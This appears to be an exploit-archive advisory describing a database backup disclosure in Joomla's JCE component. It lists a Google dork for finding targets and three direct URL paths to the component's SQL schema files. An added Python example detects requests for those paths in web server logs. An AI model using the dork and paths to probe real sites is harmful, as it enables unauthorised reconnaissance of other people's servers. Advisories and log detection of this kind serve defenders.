Joomla JCE 2.6.33 Database Backup Disclosure

Joomla JCE component versions 2.5.24 through 2.6.33 suffer from a database backup disclosure vulnerability.


MD5 | 11d1533fb969ec89076f617df0809376

#################################################################################################

# Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure Information Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/11/2018
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads/
+ github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
+ gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
+ JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.6.33 ~ 2.5.24
# Google Dorks : inurl:"/index.php?option=com_jce"
# Index of /administrator/components/com_jce/sql/
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# CWE-23 [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/administrator/

# Exploit :

/administrator/components/com_jce/sql/mysql.sql

/administrator/components/com_jce/sql/postgresql.sql

/administrator/components/com_jce/sql/sqlsrv.sql
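An added detection example, not part of the advisory: it scans Apache/nginx combined-format access log lines for requests to the three com_jce SQL paths listed above and reports whether each request was actually served (HTTP 200) or blocked. The log lines are constructed for the example; the suffix match allows for Joomla installed in a sub-directory.

```python
import re
from typing import Dict, Iterable, List

# The three installer schema files named in the advisory.
JCE_SQL_PATHS = (
    "/administrator/components/com_jce/sql/mysql.sql",
    "/administrator/components/com_jce/sql/postgresql.sql",
    "/administrator/components/com_jce/sql/sqlsrv.sql",
)

# Combined log format; only the fields this check needs are captured.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def find_jce_sql_requests(lines: Iterable[str]) -> List[Dict]:
    """Return one record per request for a com_jce SQL file, in log order."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        path = m.group("path").split("?", 1)[0]  # drop any query string
        # Joomla is frequently deployed under a sub-directory, so match the tail.
        if any(path.endswith(p) for p in JCE_SQL_PATHS):
            status = int(m.group("status"))
            hits.append({
                "ip": m.group("ip"),
                "path": path,
                "status": status,
                # 200 means the schema file was served; 403/404 means blocked/absent.
                "disclosed": status == 200,
            })
    return hits


# Constructed sample log lines (not real traffic); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Nov/2018:10:15:01 +0000] "GET /administrator/components/com_jce/sql/mysql.sql HTTP/1.1" 200 5123 "-" "curl/7.61.0"
203.0.113.7 - - [30/Nov/2018:10:15:02 +0000] "GET /joomla30/administrator/components/com_jce/sql/sqlsrv.sql HTTP/1.1" 403 199 "-" "curl/7.61.0"
198.51.100.4 - - [30/Nov/2018:10:16:10 +0000] "GET /index.php?option=com_jce HTTP/1.1" 200 8901 "-" "Mozilla/5.0"
198.51.100.4 - - [30/Nov/2018:10:16:11 +0000] "GET /administrator/components/com_jce/sql/postgresql.sql?x=1 HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in find_jce_sql_requests(SAMPLE_LOG.splitlines()):
        print(hit)
```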

#################################################################################################

# Example Vulnerable Sites =>


#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
